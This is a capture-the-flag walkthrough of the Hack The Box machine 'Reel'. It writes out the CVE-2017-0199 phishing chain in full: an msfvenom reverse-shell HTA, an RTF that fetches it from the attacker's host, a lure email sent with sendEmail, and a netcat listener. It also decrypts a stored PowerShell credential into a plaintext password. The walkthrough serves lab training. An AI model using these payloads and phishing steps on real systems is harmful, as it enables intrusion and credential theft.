Enumeration
Nmap Scanning
Command
1
└─$ nmap -sC -sV -oN nmap-scan -Pn 10.10.10.77
Result
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# Nmap 7.93 scan initiated Sat Dec 24 10:06:19 2022 as: nmap -sC -sV -oN nmap-scan -Pn 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.19s latency).
Scanned at 2022-12-24 10:06:20 EAT for 225s
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 8220c3bd16cba29c88871d6c1559eded (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQkehAZGj87mZluxFiVu+GPAAnC/OQ9QKUF2wlIwvefrD2L4zWyGXlAgSbUq/MqujR/efrTIjPYWK+5Mlxc7gEoZBylGAPbdxFivL8YQs3dQPt6aHNF0v+ABS01L2qZ4ewd1sTi1TlT6LtWHehX2PBJ6S3LWG09v+E/3ue97y9gaOjfA6BCMWgQ7K3yvQeHrRpBSk/vQxfCh4TINwV3EGbGTfbs8VvvR+Et7weB5EOifgXfHbyh04KemONkceFSAnjRRYOgwvtXai9imsDJ8KtS2RMR197VK4MBhsY7+h0nOvUMgm76RcRc6N8GW1mn6gWp98Ds9VeymzAmQvprs97
| 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAw2CYanDlTRpGqzVXrfGTcAYVe/vUnnkWicQPzdfix5gFsv4nOGNUM+Fko7QAW0jqCFQKc8anGAwJjFGLTB00k=
| 256 ac8bde251db7d838389b9c16bff63fed (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICdDfn+n5xueGtHP20/aPkI8pvCfxb2UZA3RQdqnpjBk
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
...[snip]...
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 24 10:10:05 2022 -- 1 IP address (1 host up) scanned in 226.01 seconds
Nmap show that there are only three ports which are ftp ssh and smtp
Anonymous login
Nmap showed that anonymous login is allowed into machine then i will connect to the machine.
1
2
3
4
5
6
7
8
9
10
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/reel]
└─$ ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:gemstone): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
After successfully entered as anonymous user i can list the directories to see if there is anything interesting and found documents directory.
1
2
3
4
5
6
ftp> dir
229 Entering Extended Passive Mode (|||41000|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM <DIR> documents
226 Transfer complete.
ftp>
I navigated into this directory and see some files which i copied them into my machine.
1
2
3
4
5
6
7
8
9
10
11
12
ftp> cd documents
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||41002|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> prompt
Interactive mode off.
ftp> mget *
All the files has some small details which is valuable staring with
AppLocker.docx This document provided a hint
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
readme.txt This one that we have to send an email and it has already specifies the format to be sent.
please email me any rtf format procedures - I’ll review and convert.
new format / converted documents will be saved here.
Windows Event Forwarding.docx I was unable to open this file but i checked it with exiftool to see metadata and it ends up with the interesting information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
└─$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.52
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:11:01 00:13:23+03:00
File Access Date/Time : 2023:01:05 01:20:48+03:00
File Inode Change Date/Time : 2023:01:05 01:20:41+03:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
In this file i found the email address nico@megabank.com which will be used to receive an email.
Phishing Email
This box was released during the presence of CVE-2017-0199 Then to exploit this, I’ll get the user will open an maliciousRTF file, which will make an HTTP request for an HTA file. I’ll want that HTA file to execute code to give me a shell. I will use the meterpreter to create the document
Meterpreter
Command
1
2
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f hta-psh -o msfv.hta
Result
1
2
3
4
5
6
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7295 bytes
Saved as: msfv.hta
The next step is to create RTF file which will be sent to nico@megabank.com to create the phishing mail i will use github
1
2
3
4
5
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit]
└─$ python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.5/msfv.hta -t rtf -x 0
Generating normal RTF payload.
Generated invoice.rtf successfully
Sending email.
To send to user nico@megabank.com you need to host the hta file in my case i will host it with python3 -m http.server 80 then i will send email manually by using sendEmail which contains the rtf malicious file. Here are the steps
- Hosting the file to be sent to user
nico1 2 3
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
- Start a listener by using
netcat1 2
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/reel] └─$ nc -nlvp 1234
- Send the email by using
sendEmail
Command
1
2
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit]
└─$ sendEmail -f hashghost@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v
General results
The effect should be seen to all the requests made after sending the email with attachment.
- After sending the email should you will see some similar outputs as follows
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
Jan 05 02:20:33 hashghost sendEmail[20396]: DEBUG => Connecting to 10.10.10.77:25 Jan 05 02:20:34 hashghost sendEmail[20396]: DEBUG => My IP address is: 10.10.14.5 Jan 05 02:20:34 hashghost sendEmail[20396]: SUCCESS => Received: 220 Mail Service ready Jan 05 02:20:34 hashghost sendEmail[20396]: INFO => Sending: EHLO hashghost Jan 05 02:20:34 hashghost sendEmail[20396]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP Jan 05 02:20:34 hashghost sendEmail[20396]: INFO => Sending: MAIL FROM:<hashghost@megabank.com> Jan 05 02:20:35 hashghost sendEmail[20396]: SUCCESS => Received: 250 OK Jan 05 02:20:35 hashghost sendEmail[20396]: INFO => Sending: RCPT TO:<nico@megabank.com> Jan 05 02:20:35 hashghost sendEmail[20396]: SUCCESS => Received: 250 OK Jan 05 02:20:35 hashghost sendEmail[20396]: INFO => Sending: DATA Jan 05 02:20:35 hashghost sendEmail[20396]: SUCCESS => Received: 354 OK, send. Jan 05 02:20:35 hashghost sendEmail[20396]: INFO => Sending message body Jan 05 02:20:35 hashghost sendEmail[20396]: Setting content-type: text/plain Jan 05 02:20:35 hashghost sendEmail[20396]: DEBUG => Sending the attachment [invoice.rtf] Jan 05 02:20:47 hashghost sendEmail[20396]: SUCCESS => Received: 250 Queued (11.937 seconds) Jan 05 02:20:47 hashghost sendEmail[20396]: Email was sent successfully! From: <hashghost@megabank.com> To: <nico@megabank.com> Subject: [Invoice Attached] Attachment(s): [invoice.rtf] Server: [10.10.10.77:25]
- To the python server the request should return a hit with valid response.
1 2 3 4
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.77 - - [05/Jan/2023 02:20:58] "GET /msfv.hta HTTP/1.1" 200 -
The listener should have a shell.
1 2 3 4 5 6 7
└─$ nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.77] 59061 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>
User Account
1 2
C:\Windows\system32>whoami htb\nico
User flag
1 2
C:\Users\nico\Desktop>type user.txt 322434b5216bf9d******
Privilege Escalation
In desktop directory of user
nicothere is another file namedcred.xml
1
2
3
4
5
6
7
8
9
10
11
12
C:\Users\nico\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\nico\Desktop
28/05/2018 20:07 <DIR> .
28/05/2018 20:07 <DIR> ..
27/10/2017 23:59 1,468 cred.xml
04/01/2023 22:08 34 user.txt
2 File(s) 1,502 bytes
2 Dir(s) 4,956,569,600 bytes free
This file contains the followings
1
2
3
4
5
6
7
8
9
10
11
12
13
14
C:\Users\nico\Desktop>type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>
This password seems to be of user tom because the file has "UserName">HTB\Tom and "Password". Decryption this password can be done the following command this can be found at stackoveflow
1
2
C:\Users\nico\Desktop>powershell -c "$credential = Import-CliXml -Path cred.xml; $credential.GetNetworkCredential().Password"
1ts-mag1c!!!
But this password can only be used to login as user tom by using ssh then lets do it.
1
2
3
4
5
6
7
8
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/reel]
└─$ ssh tom@10.10.10.77
tom@10.10.10.77's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>whoami
htb\tom
BloodHound data
After login as user tom in his desktop directory there is a directory named as AD Audit which inside it there is a note.txt BloodHound and powerview.ps1 script. File note.txt has some hints
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we’ve created.
In BloodHound directory
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> dir
Directory: C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/16/2017 11:50 PM 112225 acls.csv
-a--- 10/28/2017 9:50 PM 3549 BloodHound.bin
-a--- 10/24/2017 4:27 PM 246489 BloodHound_Old.ps1
-a--- 10/24/2017 4:27 PM 568832 SharpHound.exe
-a--- 10/24/2017 4:27 PM 636959 SharpHound.ps1
Almost all these tools have been blocked then i can use nico account and collect data by bloodhound by myself or i can use the acls.csv file which has details of the users of domain.
Kwa Leo wacha nisiongeee hadi nitakapomalizia.